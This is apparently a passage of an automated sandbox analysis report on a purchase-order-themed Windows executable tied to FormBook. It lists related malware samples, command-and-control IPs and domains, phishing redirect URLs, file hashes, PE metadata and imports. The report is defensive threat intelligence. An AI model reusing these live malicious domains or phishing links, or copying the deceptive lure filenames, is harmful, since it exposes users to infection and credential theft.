                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target ZQphKCYQofBW.exe, PID 3872 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
Time | Type | Description
02:48:30 | API Interceptor | 7855795x Sleep call for process: RMActivate_ssp.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context

Match: 203.161.43.228
Jsn496Em5T.exe | Get hash | malicious | FormBook | Browse | www.virox.top/basq/
Doc_PO6900000827.exe | Get hash | malicious | FormBook | Browse | www.quilo.life/ftr3/
PO_20240906011824.exe | Get hash | malicious | FormBook | Browse | www.quilo.life/ftr3/
6i4QCFbsNi.exe | Get hash | malicious | FormBook | Browse | www.virox.top/basq/
DEBIT NOTE July 2024 PART 2.exe | Get hash | malicious | FormBook | Browse | www.lyxor.top/top4/
PO 18-3081.exe | Get hash | malicious | FormBook | Browse | www.velix.buzz/0qme/
GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exe | Get hash | malicious | FormBook | Browse | www.fynra.xyz/i65r/
AIDHL3290435890.exe | Get hash | malicious | FormBook | Browse | www.quilo.life/ftr3/
PO#4510065525.exe | Get hash | malicious | FormBook | Browse | www.quilo.life/ftr3/
Yg4Sqy06Al.exe | Get hash | malicious | FormBook | Browse | www.firmshow.top/02nb/

Match: 172.96.191.39
Doc_PO6900000827.exe | Get hash | malicious | FormBook | Browse | www.bola88site.one/3lkx/
PO_20240906011824.exe | Get hash | malicious | FormBook | Browse | www.bola88site.one/3lkx/
doc330391202408011.exe | Get hash | malicious | FormBook | Browse | www.bola88site.one/wqrm/
PO #86637.exe | Get hash | malicious | FormBook | Browse | www.bola88site.one/3qit/
REQST_PRC 410240665_2024.exe | Get hash | malicious | FormBook | Browse | www.bola88site.one/wqrm/
REQST_PRC 410240.exe | Get hash | malicious | FormBook | Browse | www.bola88site.one/wqrm/
COTIZACION 290824.exe | Get hash | malicious | FormBook | Browse | www.bola88site.one/3qit/
IMG_00991ORDER_FILES.exe | Get hash | malicious | FormBook, GuLoader | Browse | www.bola88site.one/frol/
INVG0088 LHV3495264 BL327291535V.exe | Get hash | malicious | FormBook | Browse | www.bola88site.one/wqrm/
AIDHL3290435890.exe | Get hash | malicious | FormBook | Browse | www.bola88site.one/3lkx/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context

Match: www.kckartal.xyz
Doc_PO6900000827.exe | Get hash | malicious | FormBook | Browse | 172.67.192.227
PO_20240906011824.exe | Get hash | malicious | FormBook | Browse | 172.67.192.227
AIDHL3290435890.exe | Get hash | malicious | FormBook | Browse | 104.21.20.125
PO#4510065525.exe | Get hash | malicious | FormBook | Browse | 104.21.20.125

Match: www.mizuquan.top
Doc_PO6900000827.exe | Get hash | malicious | FormBook | Browse | 43.242.202.169
PO_20240906011824.exe | Get hash | malicious | FormBook | Browse | 43.242.202.169
PO #86637.exe | Get hash | malicious | FormBook | Browse | 43.242.202.169
COTIZACION 290824.exe | Get hash | malicious | FormBook | Browse | 43.242.202.169
PO#4510065525.exe | Get hash | malicious | FormBook | Browse | 43.242.202.169

Match: www.quilo.life
Doc_PO6900000827.exe | Get hash | malicious | FormBook | Browse | 203.161.43.228
PO_20240906011824.exe | Get hash | malicious | FormBook | Browse | 203.161.43.228
AIDHL3290435890.exe | Get hash | malicious | FormBook | Browse | 203.161.43.228
PO#4510065525.exe | Get hash | malicious | FormBook | Browse | 203.161.43.228
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context

Match: VNPT-AS-VNVNPTCorpVN
Jsn496Em5T.exe | Get hash | malicious | FormBook | Browse | 203.161.43.228
MV ALIADO-S-REQ-19-000640.exe | Get hash | malicious | FormBook | Browse | 203.161.42.73
Doc_PO6900000827.exe | Get hash | malicious | FormBook | Browse | 203.161.43.228
PO_20240906011824.exe | Get hash | malicious | FormBook | Browse | 203.161.43.228
doc330391202408011.exe | Get hash | malicious | FormBook | Browse | 203.161.42.73
yyyyyyyy.exe | Get hash | malicious | FormBook | Browse | 203.161.42.73
1V8XAuKZqe.exe | Get hash | malicious | FormBook | Browse | 203.161.42.161
6i4QCFbsNi.exe | Get hash | malicious | FormBook | Browse | 203.161.43.228
RBNB5FNsEZ.exe | Get hash | malicious | FormBook | Browse | 203.161.41.190
Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbs | Get hash | malicious | FormBook, GuLoader | Browse | 203.161.46.205

Match: CLOUDFLARENETUS
https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/%E2%80%8Bro%C2%ADnal%C2%ADdjack%C2%ADviet%C2%ADnam%E2%80%8B.%C2%ADv%C2%ADn/.dev/K5cX4nD6/aW5mb0BvcHRpbW92ZS5jb20==$%E3%80%82 | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
https://dl9r8y25t98wv.cloudfront.net/?YS50YW5ndXlAc2JtLm1j | Get hash | malicious | Unknown | Browse | 104.17.24.14
Documents_Verification_Review_[PDF]_#20SE6GX.html | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
PROPOSTA CONTRATTUALE.msg | Get hash | malicious | HTMLPhisher | Browse | 104.21.17.144
https://go.skimresources.com/?id=129857X1600501&url=https://www.freelancer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/c16392c5-3f33-44df-b0b3-21de244d07c1?j=eyJ1IjoiNGRnZ2x2In0.IkG1h6SLHR3lrFyu | Get hash | malicious | HTMLPhisher | Browse | 104.18.69.40
MALED_Q88_10.09.24.doc.scr.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
vessels details.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
Q88_MT Carol 2024.09.10.doc.scr.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
specifications.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
https://eu-central-1.protection.sophos.com/?d=tiktok.com&u=aHR0cHM6Ly93d3cudGlrdG9rLmNvbS8vLy8vbGluay92Mj9haWQ9MTk4OCZsYW5nPWVuRlNtUFdnJnNjZW5lPWJpb191cmwmdGFyZ2V0PWdvb2dsZS5jb20uLy8vL2FtcC9zLyVFMiU4MCU4QmMlQzIlQUR0JUMyJUFEaCVFMiU4MCU4Qi4lQzIlQUR2JUMyJUFEbi8uZGV2L0tTcEhUaEhTL2JYZHZiMlJ6UUhOell5NXVjM2N1WjI5MkxtRjE9JCVFMyU4MCU4Mg==&p=m&i=NWQwN2ZmYzMzYTI2ZjgxNDIyYzk1ZDVl&t=TXBncTdKNVIxbE4vUUNSZkZsUHZnc3YwdDVHTUM0SVFZMHhFRHdsSEJmaz0=&h=4d6999c7166643fab3b2cf307a3e9237&s=AVNPUEhUT0NFTkNSWVBUSVb-GMTbEE4rTI_ViOGlBYY0py-Up8IV-uCS_drrL8K4og4uBbd_kdu_CfA_rJxO7PTPyV6BcVDiENaJLwZqW5J9rZ6Yqn61C4tBc2kHdTZ1bRzSSZJILq9JgtGCdbMh-j8 | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse | 172.67.70.233

Match: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
PROPOSTA CONTRATTUALE.msg | Get hash | malicious | HTMLPhisher | Browse | 47.246.131.28
Doc_PO6900000827.exe | Get hash | malicious | FormBook | Browse | 47.57.185.227
5Mjl7L7bW2.exe | Get hash | malicious | Unknown | Browse | 47.88.148.135
5Mjl7L7bW2.exe | Get hash | malicious | Unknown | Browse | 47.88.148.135
SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exe | Get hash | malicious | Unknown | Browse | 8.219.136.97
SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exe | Get hash | malicious | Unknown | Browse | 8.219.48.146
Play_VM-NowBarry.doanAudiowav012.html | Get hash | malicious | Unknown | Browse | 47.246.136.160
PO_20240906011824.exe | Get hash | malicious | FormBook | Browse | 47.57.185.227
http://wetrplus.vercel.app/ | Get hash | malicious | Unknown | Browse | 47.254.218.78
http://email.email.datadirectglobal.com/c/eJzMkUGPmzAQhX_NcAuyZ_BgH3xooakiZXtou6tcjRkSGhYQcSrl31ckqtJL73t60nv26M18-_6SNq_j5dpc4tI34oGqU0oz4BZwm5YQz_14zOU99EPehhTafpGYjsPUhCGP0zvgdprTdE35fJqBti9AtUNntFYKkCugOtqSgxTcFmw7QyhSWGM0l21RImsDyHug2hpLDpC_AdVaoyULyK9AdYG4vvl6AKqr2-HXQd7ezmegL9lh8xL6QZbNfld7S6rUgJUl49yqj3mVRWV4VV0auufI7vn1u8Q57Vr_t_Qz-bGr_aPIP56MafP55tdOT_fnNB7bMPn1SsfrmLVexDBLJl6XaAwRa5edfIcqiIuaG4dl52InERtpGAsnUqqY9R4VFsopo5Uhcrm1rZbAHSHb0IUSCvV_Ftng7-zo08fHly0-dXKTEQp1GcOclmm87_Db458AAAD__8b-vpM | Get hash | malicious | Unknown | Browse | 47.52.118.140

Match: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
Doc_PO6900000827.exe | Get hash | malicious | FormBook | Browse | 172.96.191.39
OjKmJJm2YT.exe | Get hash | malicious | Simda Stealer | Browse | 103.150.11.230
5AFlyarMds.exe | Get hash | malicious | Simda Stealer | Browse | 103.150.11.230
uB31aJH4M0.exe | Get hash | malicious | Simda Stealer | Browse | 103.150.11.230
PO_20240906011824.exe | Get hash | malicious | FormBook | Browse | 172.96.191.39
doc330391202408011.exe | Get hash | malicious | FormBook | Browse | 172.96.191.39
PO #86637.exe | Get hash | malicious | FormBook | Browse | 172.96.191.39
REQST_PRC 410240665_2024.exe | Get hash | malicious | FormBook | Browse |
                      • 172.96.191.39
                      REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                      • 172.96.191.39
                      COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                      • 172.96.191.39
                      No context
                      No context
                      Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                      File Type:Unknown
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Reputation:high, very likely benign file
                      Process:C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):288768
                      Entropy (8bit):7.9928654846322695
                      Encrypted:true
                      SSDEEP:6144:O04RG+ScBf7ccnHbCHj4BOB5BfAyE6YokfF28O+zXr+G:O0zcBzccHkkBOzzWok3vX6G
                      MD5:7E201B4F5F00B0D855826B258537AC4F
                      SHA1:CDC09A216D7494ED4ABF45D280F70D298A0540FF
                      SHA-256:51C02AD299D3845C815079FD07BB8E7163A6AF7228166725A027433CD2CC50C9
                      SHA-512:0499945B3ABC9FD9D16588C5A256046981AB58F33CA9FF93C94E27AE3F10CAF3A541B556BCED1B27506FB52D92B75DD90B16F43E5C0AA7F9A0C056B09192F038
                      Malicious:false
                      Reputation:low
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.157259766896894
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:PO 09110124 EXPRESS SYSTEM-SESB24066.exe
                      File size:1'220'608 bytes
                      MD5:c029364519d917e71ec6e8be9301755b
                      SHA1:edbf0638c76e9ab5d26f84d98c94b23757685da1
                      SHA256:ecde745484cbfc4aa7ff0de292907acd4bab3b772641f09815030a2d0887073f
                      SHA512:b5ba60655171c7a37b62441e930c485901b54a9f7c91aa360f351c8dde1c199658068ae8e5b169ceeb7e73b7842753206214c5bcf019c6ed93d194ebd4ace7e6
                      SSDEEP:24576:c4lavt0LkLL9IMixoEgea12A1z7HyRvmDQ7NdI6q9MmCS:rkwkn9IMHea12KX6vm4NtaPCS
                      TLSH:A345CF0373DE83A5C3725273BA65BB01AE7B7C2506B1F59B2FD5093DE960122421EA73
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........
                      Icon Hash:aaf3e3e3938382a0
                      Entrypoint:0x426bf7
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66DF84BD [Mon Sep 9 23:29:01 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:bbac62fd99326ea68ec5a33b36925dd1
                      Instruction
                      call 00007F5BD507920Ch
                      jmp 00007F5BD506C0F4h
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      push edi
                      push esi
                      mov esi, dword ptr [esp+10h]
                      mov ecx, dword ptr [esp+14h]
                      mov edi, dword ptr [esp+0Ch]
                      mov eax, ecx
                      mov edx, ecx
                      add eax, esi
                      cmp edi, esi
                      jbe 00007F5BD506C27Ah
                      cmp edi, eax
                      jc 00007F5BD506C5DEh
                      bt dword ptr [004C0158h], 01h
                      jnc 00007F5BD506C279h
                      rep movsb
                      jmp 00007F5BD506C58Ch
                      cmp ecx, 00000080h
                      jc 00007F5BD506C444h
                      mov eax, edi
                      xor eax, esi
                      test eax, 0000000Fh
                      jne 00007F5BD506C280h
                      bt dword ptr [004BA370h], 01h
                      jc 00007F5BD506C750h
                      bt dword ptr [004C0158h], 00000000h
                      jnc 00007F5BD506C41Dh
                      test edi, 00000003h
                      jne 00007F5BD506C42Eh
                      test esi, 00000003h
                      jne 00007F5BD506C40Dh
                      bt edi, 02h
                      jnc 00007F5BD506C27Fh
                      mov eax, dword ptr [esi]
                      sub ecx, 04h
                      lea esi, dword ptr [esi+04h]
                      mov dword ptr [edi], eax
                      lea edi, dword ptr [edi+04h]
                      bt edi, 03h
                      jnc 00007F5BD506C283h
                      movq xmm1, qword ptr [esi]
                      sub ecx, 08h
                      lea esi, dword ptr [esi+08h]
                      movq qword ptr [edi], xmm1
                      lea edi, dword ptr [edi+08h]
                      test esi, 00000007h
                      je 00007F5BD506C2D5h
                      Programming Language:
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [ASM] VS2012 UPD4 build 61030
                      • [RES] VS2012 UPD4 build 61030
                      • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb6b6c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x60a3c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x125000 | 0x6c20 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2770 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x858 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8be74 | 0x8c000 | 74af66fa540568c59b3868e78900e476 | False | 0.5690970284598215 | data | 6.681489717174931 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2c76a | 0x2c800 | 576c856afaad699ad9fe099fc6a9ce33 | False | 0.33122476299157305 | zlib compressed data | 5.781163507108141 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9f34 | 0x6200 | e6d2e204147f7cdc3055011093632f54 | False | 0.1639030612244898 | data | 2.004392861291539 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x60a3c | 0x60c00 | 1d8e2936d954a8cc8349119313da7cba | False | 0.9315422117248062 | data | 7.903384825630104 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x125000 | 0xa462 | 0xa600 | c2f6ddaeef894b7510c3be928eeae5dd | False | 0.5080948795180723 | data | 5.238496692777452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x57ce5 | data | | | 1.0003225331083017
RT_GROUP_ICON | 0x1244a0 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x124518 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x12452c | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x124540 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x124554 | 0x138 | data | English | Great Britain | 0.5961538461538461
RT_MANIFEST | 0x12468c | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Imports
WSOCK32.dll: __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll: GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll: WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll: InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL: GetProcessMemoryInfo
IPHLPAPI.DLL: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll: UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll: IsThemeActive
KERNEL32.dll: WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, CloseHandle, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, CreateThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetLastError, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, DuplicateHandle, GetCurrentProcess, EnterCriticalSection, GetCurrentThread, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, FindNextFileW, SetEnvironmentVariableA
USER32.dll: CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, AdjustWindowRectEx, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, UnregisterHotKey, SystemParametersInfoW, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, GetCursorPos, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, FindWindowW, CharLowerBuffW, GetWindowTextW
GDI32.dll: SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
